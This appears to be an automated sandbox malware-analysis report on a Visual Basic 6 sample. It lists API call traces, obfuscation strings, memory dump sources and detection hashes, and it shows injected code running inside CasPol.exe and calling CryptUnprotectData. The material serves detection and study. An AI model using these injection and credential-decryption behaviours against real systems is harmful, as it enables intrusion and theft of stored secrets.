__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,00000014,?,?,?,?,?,?,?,00008008,?,?,?,?), ref: 0041F1C1
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F201
#703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F21B
__vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F225
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040259C,0000013C,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F254
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F26B
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F273
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F27B
#536.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F292
__vbaStrMove.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F29C
__vbaFreeVar.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F2A4
__vbaFreeStr.MSVBVM60(0041F303,00000003,00008008,?,?,?,?,00004008), ref: 0041F2DD
__vbaFreeStr.MSVBVM60(0041F303,00000003,00008008,?,?,?,?,00004008), ref: 0041F2E5
__vbaFreeStr.MSVBVM60(0041F303,00000003,00008008,?,?,?,?,00004008), ref: 0041F2ED
__vbaFreeStr.MSVBVM60(0041F303,00000003,00008008,?,?,?,?,00004008), ref: 0041F2F5
__vbaFreeStr.MSVBVM60(0041F303,00000003,00008008,?,?,?,?,00004008), ref: 0041F2FD

Strings

Gurgledes, xrefs: 0041F029
ICHTHYOPOLISM, xrefs: 0041F050

Memory Dump Source

Source File: 00000001.00000002.24596010744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.24595979857.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.24596209797.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.24596248024.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$CopyMove$ChkstkNew2$#524#536#703
String ID: Gurgledes$ICHTHYOPOLISM
API String ID: 2536202667-1995639141
Opcode ID: dbb2e53154abe45100cd9caffe59d6aaeb0614202a8b407e753c84149f1a7871
Instruction ID: 720fcd5b48a0563e29dae46cf2584c25484159a1554e856bec4d34874f29d809
Opcode Fuzzy Hash: dbb2e53154abe45100cd9caffe59d6aaeb0614202a8b407e753c84149f1a7871
Instruction Fuzzy Hash: 9E91F771D00218EFDB10EFA5C985BDDBBB5BF09304F20816AE105B72A2DB785A49CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041F31E, Relevance: 50.9, APIs: 24, Strings: 5, Instructions: 130COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F33C
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F354
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F35F
__vbaLenBstrB.MSVBVM60(Dukkestuer,?,?,?,?,00401546), ref: 0041F36F
#564.MSVBVM60(00000004,?), ref: 0041F39C
__vbaHresultCheck.MSVBVM60(00000000,00000004,?), ref: 0041F3B6
__vbaVarTstLt.MSVBVM60(?,00008003,?,?,?,00000004,?), ref: 0041F3D5
__vbaFreeVarList.MSVBVM60(00000002,00000004,?,?,00008003,?,?,?,00000004,?), ref: 0041F3EB
#546.MSVBVM60(?,?,?,00401546), ref: 0041F406
__vbaVarMove.MSVBVM60(?,?,?,00401546), ref: 0041F411
__vbaVarDup.MSVBVM60 ref: 0041F438
#629.MSVBVM60(?,?,00000005,00000002), ref: 0041F44B
__vbaStrVarVal.MSVBVM60(?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F45E
#712.MSVBVM60(OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F46E
__vbaStrMove.MSVBVM60(OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F478
#527.MSVBVM60(00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F47E
__vbaStrMove.MSVBVM60(00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F488
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F497
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,00401546), ref: 0041F4AD
__vbaStrCopy.MSVBVM60(?,?,00401546), ref: 0041F4BD
__vbaFreeStr.MSVBVM60(0041F526,?,?,00401546), ref: 0041F508
__vbaFreeStr.MSVBVM60(0041F526,?,?,00401546), ref: 0041F510
__vbaFreeVar.MSVBVM60(0041F526,?,?,00401546), ref: 0041F518
__vbaFreeStr.MSVBVM60(0041F526,?,?,00401546), ref: 0041F520

Strings

SNVRET, xrefs: 0041F464
Dukkestuer, xrefs: 0041F36A
LAAGETS, xrefs: 0041F424
OVERBEBYRDES, xrefs: 0041F469
Antievangelical9, xrefs: 0041F4B5

Memory Dump Source

Source File: 00000001.00000002.24596010744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.24595979857.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.24596209797.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.24596248024.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CopyListMove$#527#546#564#629#712BstrCheckChkstkHresult
String ID: Antievangelical9$Dukkestuer$LAAGETS$OVERBEBYRDES$SNVRET
API String ID: 3927249403-1920341584
Opcode ID: 97c0590f2807978d3ad349704e9c25ddbcc2a75891fce037fee68b45005be11f
Instruction ID: c5e0310e442c1fc63c8630c01528c66992ce604f470dedb83ecca95e677437e3
Opcode Fuzzy Hash: 97c0590f2807978d3ad349704e9c25ddbcc2a75891fce037fee68b45005be11f
Instruction Fuzzy Hash: 4251FA72D0020DABDB10EBE1C846FDEB778AF04704F10817BB515B71E1EB785A498B99

Uniqueness

Uniqueness Score: -1.00%

Function 0041E9A9, Relevance: 38.6, APIs: 18, Strings: 4, Instructions: 95COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041E9C5
__vbaInStrB.MSVBVM60(00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EA00
__vbaVarDup.MSVBVM60 ref: 0041EA32
#629.MSVBVM60(?,00000000,00000048,00000002), ref: 0041EA45
__vbaStrVarMove.MSVBVM60(?,?,00000000,00000048,00000002), ref: 0041EA4E
__vbaStrMove.MSVBVM60(?,?,00000000,00000048,00000002), ref: 0041EA58
__vbaFreeVarList.MSVBVM60(00000003,00000000,00000002,?,?,?,00000000,00000048,00000002), ref: 0041EA6B
#539.MSVBVM60(?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041EA80
__vbaStrVarMove.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041EA89
__vbaStrMove.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041EA93
__vbaFreeVar.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041EA9B
#696.MSVBVM60(GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EAA5
#698.MSVBVM60(00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EAB2
__vbaStrVarMove.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EABB
__vbaStrMove.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EAC5
__vbaFreeVar.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EACD
__vbaFreeStr.MSVBVM60(0041EB13,00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EB05
__vbaFreeStr.MSVBVM60(0041EB13,00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EB0D

Strings

Flskekdet, xrefs: 0041EA1E
Fritgaaende, xrefs: 0041E9F9
GILENO, xrefs: 0041EAA0
SKADESLSHOLDELSERNE, xrefs: 0041E9F4

Memory Dump Source

Source File: 00000001.00000002.24596010744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.24595979857.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.24596209797.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.24596248024.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Free$#539#629#696#698ChkstkList
String ID: Flskekdet$Fritgaaende$GILENO$SKADESLSHOLDELSERNE
API String ID: 1195518721-3815085929
Opcode ID: 792bcc5b0b5771924dc76fa28966765902c0f0f24e719fc757ddec4d17a03b91
Instruction ID: 80a007722e124d3b8b95c9007be0cbd2b36adfb14f404f2829f5d4aadfea0baa
Opcode Fuzzy Hash: 792bcc5b0b5771924dc76fa28966765902c0f0f24e719fc757ddec4d17a03b91
Instruction Fuzzy Hash: 7031C972940258ABDB00FBD1DD86FEE77B8AF04704F54442AB501BB1E1DB78AA09CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00420967, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 165COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420985
#535.MSVBVM60(?,?,?,?,00401546), ref: 004209CF
__vbaNew2.MSVBVM60(0040258C,004223C0,?,?,?,?,00401546), ref: 004209F1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,0000004C), ref: 00420A53
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402ED8,00000028), ref: 00420AA5
__vbaFreeObj.MSVBVM60(00000000,?,00402ED8,00000028), ref: 00420ABC
#702.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420AE2
__vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420AEC
__vbaFreeVar.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420AF4
#613.MSVBVM60(?,00000003,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420B16
#632.MSVBVM60(?,?,000000E7,?,?,00000003,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420B3A
#704.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,000000E7,?,?,00000003), ref: 00420B5F
__vbaVarTstEq.MSVBVM60(00008008,?,00000003,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,000000E7,?), ref: 00420B7F
__vbaFreeVarList.MSVBVM60(00000006,00000003,?,?,00000003,?,00008008,00008008,?,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420BAB
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,00401546), ref: 00420BC7
#527.MSVBVM60(Cryptodeist,000000FF,?,?,?,?,?,?,00401546), ref: 00420BD8
__vbaStrMove.MSVBVM60(Cryptodeist,000000FF,?,?,?,?,?,?,00401546), ref: 00420BE2
__vbaFreeStr.MSVBVM60(00420C46), ref: 00420C38
__vbaFreeStr.MSVBVM60(00420C46), ref: 00420C40

Strings

Cryptodeist, xrefs: 00420BD3

Memory Dump Source

Source File: 00000001.00000002.24596010744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.24595979857.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.24596209797.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.24596248024.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#527#535#613#632#702#704ChkstkErrorListNew2
String ID: Cryptodeist
API String ID: 3497234973-3010629389
Opcode ID: 4d84a0bcfb7bfbb7f2d1f1b86af96cbeab2c02cd8ef88536f9ec5f67f86db732
Instruction ID: e72bbe9dc01ec8dd27a97ee2d0d9112797095cbfa56676e4da504ca801a9bcef
Opcode Fuzzy Hash: 4d84a0bcfb7bfbb7f2d1f1b86af96cbeab2c02cd8ef88536f9ec5f67f86db732
Instruction Fuzzy Hash: F67129B1900258EBDB10DF91CE45BDEB7B8AF04314F6086AAE115B71E1DB785B88CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00420319, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420334
#669.MSVBVM60(?,?,?,?,00401546), ref: 00420346
__vbaStrMove.MSVBVM60(?,?,?,?,00401546), ref: 00420350
__vbaStrCmp.MSVBVM60(Skimmia,00000000,?,?,?,?,00401546), ref: 0042035B
__vbaFreeStr.MSVBVM60(Skimmia,00000000,?,?,?,?,00401546), ref: 0042036E
#537.MSVBVM60(00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 00420381
__vbaStrMove.MSVBVM60(00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042038B
__vbaNew2.MSVBVM60(0040258C,004223C0,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 004203A3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,00000014,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 004203E7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040259C,00000138,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042042B
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042043C
__vbaFreeStr.MSVBVM60(00420469,Skimmia,00000000,?,?,?,?,00401546), ref: 00420463

Strings

Skimmia, xrefs: 00420356
Printermanualen, xrefs: 004203FD

Memory Dump Source

Source File: 00000001.00000002.24596010744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.24595979857.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.24596209797.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.24596248024.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#537#669ChkstkNew2
String ID: Printermanualen$Skimmia
API String ID: 2004920347-2169568590
Opcode ID: b61a4e0b07b356246ed6dd7dee1fd5942192a92bbf41aed2dd0e0acf5bfa9d31
Instruction ID: 9cc1c95e906380b6d7c0f54b086d1f35f63e296d71be5c7c2db48c6832f924cb
Opcode Fuzzy Hash: b61a4e0b07b356246ed6dd7dee1fd5942192a92bbf41aed2dd0e0acf5bfa9d31
Instruction Fuzzy Hash: DA31FC71A50218AFDB00EFA5D985BEDBBF4BF08704F60402AF501B71E1DBB85945CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041EDDC, Relevance: 22.6, APIs: 15, Instructions: 81COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041EDF8
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EE22
__vbaVarDup.MSVBVM60 ref: 0041EE49
#607.MSVBVM60(?,000000BB,?), ref: 0041EE5B
__vbaStrVarMove.MSVBVM60(?,?,000000BB,?), ref: 0041EE64
__vbaStrMove.MSVBVM60(?,?,000000BB,?), ref: 0041EE6E
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,000000BB,?), ref: 0041EE7D
#717.MSVBVM60(?,00006011,00000040,00000000), ref: 0041EE9E
__vbaStrVarMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041EEA7
__vbaStrMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041EEB1
__vbaFreeVar.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041EEB9
__vbaFreeStr.MSVBVM60(0041EEFC,?,?,?,?,00401546), ref: 0041EEDB
__vbaAryDestruct.MSVBVM60(00000000,?,0041EEFC,?,?,?,?,00401546), ref: 0041EEE6
__vbaFreeStr.MSVBVM60(00000000,?,0041EEFC,?,?,?,?,00401546), ref: 0041EEEE
__vbaFreeStr.MSVBVM60(00000000,?,0041EEFC,?,?,?,?,00401546), ref: 0041EEF6

Memory Dump Source

Source File: 00000001.00000002.24596010744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.24595979857.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.24596209797.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.24596248024.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#607#717ChkstkCopyDestructList
String ID:
API String ID: 1752509113-0
Opcode ID: b9be95959dce452ec7a98c79e9863dc0c18b11ac0bcb5f4ff059d9f793dddc06
Instruction ID: 4441adc35d77bd4c428dfc6f103f2216e8ae7621525d35b4c9a06c477ca7186b
Opcode Fuzzy Hash: b9be95959dce452ec7a98c79e9863dc0c18b11ac0bcb5f4ff059d9f793dddc06
Instruction Fuzzy Hash: 9931DE76900248ABDB04FBD1C986BDEB7B9AF04704F50843AB505B71E1EB786B09CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041FC09, Relevance: 16.5, APIs: 11, Instructions: 47COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041FC25
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FC4F
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FC5A
#612.MSVBVM60(?,?,?,?,?,00401546), ref: 0041FC63
__vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FC6C
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FC76
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FC7E
#554.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FC83
__vbaFreeStr.MSVBVM60(0041FCB1,?,?,?,?,?,?,00401546), ref: 0041FC9B
__vbaFreeStr.MSVBVM60(0041FCB1,?,?,?,?,?,?,00401546), ref: 0041FCA3
__vbaFreeStr.MSVBVM60(0041FCB1,?,?,?,?,?,?,00401546), ref: 0041FCAB

Memory Dump Source

Source File: 00000001.00000002.24596010744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.24595979857.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.24596209797.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.24596248024.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CopyMove$#554#612Chkstk
String ID:
API String ID: 3453574145-0
Opcode ID: fb038257a54215e100ec620f2b113f154abc0cce774c22c2cb1d934545701afd
Instruction ID: d95513f1a388698f6048546383d07725ce3d06fdacb9cb1c34183f2d4cb7e640
Opcode Fuzzy Hash: fb038257a54215e100ec620f2b113f154abc0cce774c22c2cb1d934545701afd
Instruction Fuzzy Hash: E611FA31910149ABCB00FFA2C986EDEB774BF44748F50853AB501771E1EB3CAA06CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00421067, Relevance: 13.6, APIs: 9, Instructions: 53COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00421083
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 004210AD
#698.MSVBVM60(?,00005745,?,?,?,?,00401546), ref: 004210BB
#520.MSVBVM60(?,?,?,00005745,?,?,?,?,00401546), ref: 004210C8
__vbaStrVarMove.MSVBVM60(?,?,?,?,00005745,?,?,?,?,00401546), ref: 004210D1
__vbaStrMove.MSVBVM60(?,?,?,?,00005745,?,?,?,?,00401546), ref: 004210DB
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,00005745,?,?,?,?,00401546), ref: 004210EA
__vbaFreeStr.MSVBVM60(00421123), ref: 00421115
__vbaFreeStr.MSVBVM60(00421123), ref: 0042111D

Memory Dump Source

Source File: 00000001.00000002.24596010744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.24595979857.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.24596209797.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.24596248024.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#520#698ChkstkCopyList
String ID:
API String ID: 415313431-0
Opcode ID: 6461ee5c354eb87dc3828b61f05cc15f8fdc49cdf3789d5581b9045019226f7a
Instruction ID: 82f5dfab400b30e74159026a942c374ba6e551cee8f4a93f22cdf5682beecedd
Opcode Fuzzy Hash: 6461ee5c354eb87dc3828b61f05cc15f8fdc49cdf3789d5581b9045019226f7a
Instruction Fuzzy Hash: 6E11EF72D00218ABCB00FF91DD86EEEB7BCBF44748F54842AF601A71A1EB789605CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041F541, Relevance: 13.6, APIs: 9, Instructions: 50COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F55D
#707.MSVBVM60(0000000C,00000000,?,?,?,?,00401546), ref: 0041F585
__vbaStrMove.MSVBVM60(0000000C,00000000,?,?,?,?,00401546), ref: 0041F58F
#593.MSVBVM60(0000000A), ref: 0041F5AC
__vbaFreeVar.MSVBVM60(0000000A), ref: 0041F5B7
#537.MSVBVM60(0000003B,0000000A), ref: 0041F5BE
__vbaStrMove.MSVBVM60(0000003B,0000000A), ref: 0041F5C8
__vbaFreeStr.MSVBVM60(0041F5EF,0000000C,00000000,?,?,?,?,00401546), ref: 0041F5E1
__vbaFreeStr.MSVBVM60(0041F5EF,0000000C,00000000,?,?,?,?,00401546), ref: 0041F5E9

Memory Dump Source

Source File: 00000001.00000002.24596010744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.24595979857.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.24596209797.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.24596248024.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#537#593#707Chkstk
String ID:
API String ID: 2467297632-0
Opcode ID: 8cc3b6ec27578a9a6ab8daf3a2545104c50b70a72e0f575bcbd2548207f35ca0
Instruction ID: 058712b8ce04bfa23d7a86b34aa372a00603dedd0dc58742632bc92af5f3ad60
Opcode Fuzzy Hash: 8cc3b6ec27578a9a6ab8daf3a2545104c50b70a72e0f575bcbd2548207f35ca0
Instruction Fuzzy Hash: 23112171940205ABDB01FFA1CC42BDE7BB4AF00704F10843AB501B71E1DF789645CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041EF1B, Relevance: 12.0, APIs: 8, Instructions: 48COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041EF37
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EF61
__vbaFPFix.MSVBVM60(?,?,?,?,00401546), ref: 0041EF74
#536.MSVBVM60(00000005), ref: 0041EF87
__vbaStrMove.MSVBVM60(00000005), ref: 0041EF91
__vbaFreeVar.MSVBVM60(00000005), ref: 0041EF99
__vbaFreeStr.MSVBVM60(0041EFC0,00000005), ref: 0041EFB2
__vbaFreeStr.MSVBVM60(0041EFC0,00000005), ref: 0041EFBA

Memory Dump Source

Source File: 00000001.00000002.24596010744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.24595979857.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.24596209797.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.24596248024.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#536ChkstkCopyMove
String ID:
API String ID: 983360083-0
Opcode ID: fd91cf6348d1a4d78fb69df26f73506acdfb76d80de657453951e01cbef83183
Instruction ID: 5b255a183a487d0d0602ac83322b86d6a018e46cb067aa11757595a01c51abf0
Opcode Fuzzy Hash: fd91cf6348d1a4d78fb69df26f73506acdfb76d80de657453951e01cbef83183
Instruction Fuzzy Hash: 99113C35800209ABCB00FFA6C846BDEBBB4BF05748F10846AF801771E1DB389A458B59

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CasPol.exe PID: 1268 Parent PID: 592 CasPol.exeCOMMON

Executed Functions

Function 01046950, Relevance: 4.0, APIs: 2, Instructions: 960libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 010469D5
LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: 66b8c0002d601e1c1cd8db67dee238f6adc1dbf831a6bc2cd28faa2fb5b64a9b
Instruction ID: 3316d76063d23dae31c3a74ffda9d9545484b98b0d5b61fe48e3f44192e9957d
Opcode Fuzzy Hash: 66b8c0002d601e1c1cd8db67dee238f6adc1dbf831a6bc2cd28faa2fb5b64a9b
Instruction Fuzzy Hash: 97A2F6B4A04228CFDB64DF70C89879DB7B6BF88305F1181EAD94AA3254DB359E81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 013665E8, Relevance: 1.7, APIs: 1, Instructions: 195libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 013666F1

Memory Dump Source

Source File: 00000005.00000002.29205527303.0000000001360000.00000040.00000010.sdmp, Offset: 01360000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 79538b463c860ce62efb8956dc644d61ad74b48a75b4fd5e98c8e0110ea93ac4
Instruction ID: 6edd486d229204c1ea21fd55d1c2e63f454e926ddb6cfaed0b4a8516ff9a2af7
Opcode Fuzzy Hash: 79538b463c860ce62efb8956dc644d61ad74b48a75b4fd5e98c8e0110ea93ac4
Instruction Fuzzy Hash: 1361E470B042458FDB04DBB4C899AAE7BFAAF85304F15856AE402DB295EB74DC05CB51

Uniqueness

Uniqueness Score: -1.00%

Function 011179D4, Relevance: 1.6, APIs: 1, Instructions: 93threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(E9CCB547,-54F204F5), ref: 01117BEF

Memory Dump Source

Source File: 00000005.00000002.29203731039.0000000001117000.00000040.00000001.sdmp, Offset: 01117000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 7cb36666cb81286a6a8bfa50d5f55760cc8f22ba8071b5ad9e64f354e3648b32
Instruction ID: 10bbf858107b80cfd07bf9fdd8a8137660e7fe3fb27b11fed7f3839960fcfdf5
Opcode Fuzzy Hash: 7cb36666cb81286a6a8bfa50d5f55760cc8f22ba8071b5ad9e64f354e3648b32
Instruction Fuzzy Hash: B131F671409255CFDF7D8F68C8C8BA7B7E1AF51210F868175C84A8B3AAD3348885CB56

Uniqueness

Uniqueness Score: -1.00%

Function 01575088, Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 015758D5

Memory Dump Source

Source File: 00000005.00000002.29205964733.0000000001570000.00000040.00000010.sdmp, Offset: 01570000, based on PE: false

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 97d68da9283bd54fa3560b12fa3e66cd5fd63d0cfe04f73cb5cd5aeb38644360
Instruction ID: 2bfdff22e4a4c20c5b0bb5e85baf8041e7d8102302e56b2af2ea84e4d7077dcb
Opcode Fuzzy Hash: 97d68da9283bd54fa3560b12fa3e66cd5fd63d0cfe04f73cb5cd5aeb38644360
Instruction Fuzzy Hash: 43111472800249DFCB10CF99D845BEEBFF4EF48320F248829E614AB651D375A950DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01575868, Relevance: 1.6, APIs: 1, Instructions: 53encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 015758D5

Memory Dump Source

Source File: 00000005.00000002.29205964733.0000000001570000.00000040.00000010.sdmp, Offset: 01570000, based on PE: false

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 04b0a13c166aa9a09e6259ff43fccf7ce5de1a1b14f14da0d90608388fce6f45
Instruction ID: 93cdf69b3f5a4e034afd7ca2fe2760e63428daca02090784e476735a356debd6
Opcode Fuzzy Hash: 04b0a13c166aa9a09e6259ff43fccf7ce5de1a1b14f14da0d90608388fce6f45
Instruction Fuzzy Hash: 44115672800249DFDB10CF99D805BEEBFF4EF48320F248819E554A7611C334A550DFA1

